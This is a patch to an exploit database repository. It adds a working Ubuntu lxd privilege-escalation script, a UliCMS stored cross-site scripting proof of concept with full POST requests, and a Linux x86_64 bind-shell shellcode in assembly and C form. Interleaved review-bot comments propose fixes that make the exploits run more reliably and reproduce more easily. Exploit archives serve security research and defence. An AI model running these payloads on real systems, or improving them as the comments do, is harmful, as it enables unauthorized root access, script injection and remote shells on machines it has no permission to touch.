From 51bf94ed48a0ffb1ca4cce007b8c9ac07f7be98e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 11 Jun 2019 05:01:53 +0000
Subject: [PATCH] DB: 2019-06-11 5 changes to exploits/shellcodes Ubuntu 18.04 - 'lxd' Privilege Escalation UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)
---
 exploits/linux/local/46978.sh | 50 ++++++++++
 exploits/php/webapps/46840.txt | 4 -
 exploits/php/webapps/46852.txt | 6 --
 exploits/php/webapps/46977.txt | 65 +++++++++++++
 files_exploits.csv | 2 +
 files_shellcodes.csv | 1 +
 shellcodes/linux_x86-64/46979.c | 166 ++++++++++++++++++++++++++++++++
 7 files changed, 284 insertions(+), 10 deletions(-)
 create mode 100755 exploits/linux/local/46978.sh
 create mode 100644 exploits/php/webapps/46977.txt
 create mode 100644 shellcodes/linux_x86-64/46979.c
diff --git a/exploits/linux/local/46978.sh b/exploits/linux/local/46978.sh
new file mode 100755
index 000000000..a3c2414bc
--- /dev/null
+++ b/exploits/linux/local/46978.sh
@@ -0,0 +1,50 @@
+#!/usr/bin/env bash
+
+# ----------------------------------
+# Authors: Marcelo Vazquez (S4vitar)
+# Victor Lasa (vowkin)
+# ----------------------------------
+
+# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
+# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
+# Step 3: Run this script and you will get root [Victim Machine]
+# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine
+
+function helpPanel(){
+ echo -e "\nUsage:"
+ echo -e "\t[-f] Filename (.tar.gz alpine file)"
+ echo -e "\t[-h] Show this help panel\n"
+ exit 1
+}
+
+function createContainer(){
+ lxc image import $filename --alias alpine && lxd init --auto
+ echo -e "[*] Listing images...\n" && lxc image list
+ lxc init alpine privesc -c security.privileged=true
+ lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
+ lxc start privesc
+ lxc exec privesc sh
+ cleanup
+}
+
+function cleanup(){
+ echo -en "\n[*] Removing container..."
+ lxc stop privesc && lxc delete privesc && lxc image delete alpine
+ echo " [√]"
+}
+
+set -o nounset
+set -o errexit
+
+declare -i parameter_enable=0; while getopts ":f:h:" arg; do
+ case $arg in
+ f) filename=$OPTARG && let parameter_enable+=1;;
+ h) helpPanel;;
+ esac
+done
+
+if [ $parameter_enable -ne 1 ]; then
+ helpPanel
+else
+ createContainer
+fi
\ No newline at end of file
diff --git a/exploits/php/webapps/46840.txt b/exploits/php/webapps/46840.txt
index fdf73fd1d..ca3292869 100644
--- a/exploits/php/webapps/46840.txt
+++ b/exploits/php/webapps/46840.txt
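Review bot: With `set -o errexit` in force, a non-zero status from `lxc exec privesc sh` in createContainer (the last command run inside the shell failing before Ctrl-D) aborts the script before `cleanup` runs, leaving a `security.privileged=true` container with the host root filesystem mounted at /mnt/root, plus the imported image, behind on the target. Register the cleanup instead of calling it inline: `trap cleanup EXIT` right after the two `set -o` lines, and `lxc exec privesc sh || true` so the interactive shell's exit status cannot kill the script. Separately, `getopts ":f:h:"` declares `-h` as taking an argument, so a bare `-h` lands in the unhandled `:` case and help only appears because `parameter_enable` stays 0, while `-f file -h` runs the exploit instead of printing help; the optstring should be `":f:h"`. `$filename` is unquoted in `lxc image import $filename --alias alpine`, so a path containing spaces is word-split; quote it as `"$filename"`.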
@@ -33,8 +33,6 @@ Inject Here] # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp -# Software Link: -http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html # Version: v8.1 # Category: Webapps # Tested on: Wamp64, Windows @@ -62,8 +60,6 @@ Inject Here] # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp -# Software Link: -http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html # Version: v8.1 # Category: Webapps # Tested on: Wamp64, Windows diff --git a/exploits/php/webapps/46852.txt b/exploits/php/webapps/46852.txt index decca2a42..0b94fa49d 100644 --- a/exploits/php/webapps/46852.txt +++ b/exploits/php/webapps/46852.txt @@ -5,8 +5,6 @@ # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 -# Software Link: -https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/ # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows @@ -29,8 +27,6 @@ Inject Here] # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 -# Software Link: -https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/ # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows @@ -53,8 +49,6 @@ INPUT]2350265[SQL Inject Here] # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 -# Software Link: -https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/ # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows 
diff --git a/exploits/php/webapps/46977.txt b/exploits/php/webapps/46977.txt
new file mode 100644
index 000000000..e297f7737
--- /dev/null
+++ b/exploits/php/webapps/46977.txt
@@ -0,0 +1,65 @@
+# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting
+# Google Dork: intext:"by UliCMS"
+# Date: 2019-05-12
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://en.ulicms.de
+# Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig
+# Version: 2019.1
+# Tested on: Kali Linux
+# CVE : CVE-2019-11398
+
+
+# Description
+# This vulnerability is in the authentication state and is located in the CMS management panel, and the type of vulnerability is Stored and the vulnerability parameters are as follows.
+
+# Vuln One
+# URI: POST /ulicms/admin/index.php?action=languages
+# Parameter: name=">
+
+# Vuln Two
+# URI: POST /ulicms/admin/index.php?action=pages_edit&page=23
+# Parameter: systemname=">
+
+
+#
+# PoC POST (Cross Site Scripting Stored)
+#
+POST /ulicms/admin/index.php HTTP/1.1
+Host: XXXXXXXX.ngrok.io
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 165
+Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E
+
+
+#
+# PoC POST (Cross Site Scripting Stored)
+#
+POST /ulicms/admin/index.php HTTP/1.1
+Host: XXXXXXXX.ngrok.io
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 904
+Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
+Connection: close
+DNT: 1
+
+csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content=
+
+
+# Discovered by:
+t.me/Unk9vvN
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e77f20dd2..1ebc22f40 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
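Review bot: The Description block says only that the issue is "in the authentication state" in the management panel; it does not say which backend role is needed to reach `sClass=LanguageController&sMethod=create` and `sClass=PageController&sMethod=edit`, nor on which view the stored `name` / `systemname` value is later rendered and the script executes, so a reader cannot judge impact. A line under each "Vuln" entry such as `# Requires: authenticated backend user with language/page management rights; payload fires when the languages list / page editor is viewed` (wording to be confirmed against the application) would close that gap. Both PoC requests carry a literal `csrf_token` and `5cfc346c4b87e_SESSION` cookie from the author's own session; a note that these must be replaced with values from the tester's authenticated session would prevent a failed reproduction. The file title says "Stored" while the commit subject and the files_exploits.csv entry say "Persistent"; either is fine, but the three should agree.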
@@ -10542,6 +10542,7 @@ id,file,description,date,author,type,platform,port
 46972,exploits/windows/local/46972.html,"Nvidia GeForce Experience Web Helper - Command Injection",2019-06-03,"Rhino Security Labs",local,windows,
 46973,exploits/linux/local/46973.md,"Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution",2019-06-04,Arminius,local,linux,
 46976,exploits/windows/local/46976.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)",2019-06-07,SandboxEscaper,local,windows,
+46978,exploits/linux/local/46978.sh,"Ubuntu 18.04 - 'lxd' Privilege Escalation",2019-06-10,s4vitar,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41384,3 +41385,4 @@ id,file,description,date,author,type,platform,port
 46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,
 46971,exploits/hardware/webapps/46971.txt,"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion",2019-06-06,"Dhiraj Mishra",webapps,hardware,
+46977,exploits/php/webapps/46977.txt,"UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting",2019-06-10,Unk9vvN,webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 019264821..08547c998 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -968,3 +968,4 @@ id,file,description,date,author,type,platform
 46870,shellcodes/linux_x86-64/46870.c,"Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes)",2019-05-20,"Aron Mihaljevic",shellcode,linux_x86-64
 46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64
 46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64
+46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/46979.c b/shellcodes/linux_x86-64/46979.c
new file mode 100644
index 000000000..c9273ed47
--- /dev/null
+++ b/shellcodes/linux_x86-64/46979.c
@@ -0,0 +1,166 @@
+;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) (104 bytes)
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length: 104 bytes
+;github = https://github.com/STARRBOY
+;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"
+
+
+================== ASSEMBLY ========================================
+
+global _start
+
+
+section .text
+
+_start:
+
+
+
+ ;create_socket
+ ;int socket(AF_INET, SOCK_STREAM, 0);
+
+ push 41 ;sys_socket
+ pop rax
+ push 2 ;AF_INET
+ pop rdi
+ push 1 ;SOCK_STREAM
+ pop rsi
+ xor rdx, rdx
+ syscall
+
+ ;save the return value for future use
+ xchg rdi, rax
+
+
+ ; sin_zero: 0
+ ; sin_addr.s_addr: INADDR_ANY = 0
+ ; sin_port: 4444
+ ; sin_family: AF_INET = 2
+
+ push 2 ;sin_family = AF_INET
+ mov word [rsp + 2], 0x5c11 ;port = 4444
+ push rsp
+ pop rsi
+
+
+
+
+bind:
+ ;int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
+
+ push 49 ;sys_bind
+ pop rax
+ push rsp
+ pop rsi ;sockaddr stack pointer
+ push 16 ;sizeof sockaddr
+ pop rdx
+ syscall
+
+
+listen:
+ ;int listen(int sockfd, int backlog);
+
+ push 50 ;sys_listen
+ pop rax
+ push 1
+ pop rsi ;backlog = number of clients = 1
+ syscall
+
+
+accept:
+ ;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+
+
+
+
+ push 43 ;sys_accept
+ pop rax
+ sub rsp, 16 ;size of the structure on the stack
+ push rsp
+ pop rsi ;struct sockaddr
+ push 16 ;length of the address
+ push rsp ;stack pointer for struct size
+ pop rdx
+ syscall
+
+
+ xchg r10, rax ;save client socket in r10, since we won't use that register for any other operation
+
+
+close:
+ ;int close(int fd);
+
+ push 3 ;sys_close
+ pop rax
+ push rax ;save 3 on the stack for rsi in dup2
+ syscall
+
+
+ xchg rdi, r10 ;client socket as first parameter for dup2
+ pop rsi ;parameter for dup2 = 3
+
+dup2loop:
+
+ ; int dup2(int oldfd, int newfd);
+
+ push 33 ;sys_dup2
+ pop rax
+ dec rsi
+ syscall
+ loopnz dup2loop
+
+
+
+spawn_shell:
+
+ ;int execve(const char *filename, char *const argv[],char *const envp[]);
+
+ xor rsi, rsi ;clear rsi
+ push rsi ;push null on the stack
+ mov rdi, 0x68732f2f6e69622f ;/bin//sh in reverse order
+ push rdi
+ push rsp
+ pop rdi ;stack pointer to /bin//sh
+ mov al, 59 ;sys_execve
+ cdq ;sign extend of eax
+ syscall
+
+
+
+
+
+
+=======Generate Shellcode==========================================
+nasm -felf64 tcp_bind_shell.nasm -o tcp_bind_shell.o
+ld tcp_bind_shell.o -o tcp_bind_shell
+
+
+=========generate C program to exploit=============================
+gcc -fno-stack-protector -z execstack bind.c -o bind
+
+
+======================C program=====================================
+
+#include
+#include
+
+unsigned char shellcode[]=\
+ "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05"
+ "\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x11\x5c\x54\x5e\x6a"
+ "\x31\x58\x54\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x01"
+ "\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10"
+ "\x54\x5a\x0f\x05\x49\x92\x6a\x03\x58\x50\x0f\x05\x49\x87"
+ "\xfa\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\xe0\xf6\x48\x31"
+ "\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54"
+ "\x5f\xb0\x3b\x99\x0f\x05";
+
+
+int main(){
+
+ printf("length of your shellcode is: %d\n", (int)strlen(shellcode));
+
+ int (*ret)() = (int(*)())shellcode;
+
+ ret();
+}
\ No newline at end of file
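Review bot: The two `#include` directives in the C harness name no header as the hunk shows them, so `printf` and `strlen` are undeclared and the file will not build with the quoted `gcc` line; they should read `#include <stdio.h>` and `#include <string.h>` (if the angle-bracketed names were only lost in transit, this is a no-op for the committed file). `strlen(shellcode)` is a correct length here only because none of the 104 bytes is 0x00; a comment such as `/* payload has no NUL bytes, so strlen() matches the 104-byte length in the title */` would keep a future payload edit from silently reporting a truncated count. In the assembly, the `loopnz dup2loop` exit depends on rcx being non-zero after each `syscall` (the kernel returns with rcx holding the user return address), which holds on Linux but is worth stating in the line's `;` comment so the loop is not mistaken for a counted one. The `push rsp` / `pop rsi` pair at the top of `bind:` repeats the assignment already made just before the label and could be dropped if the byte count matters.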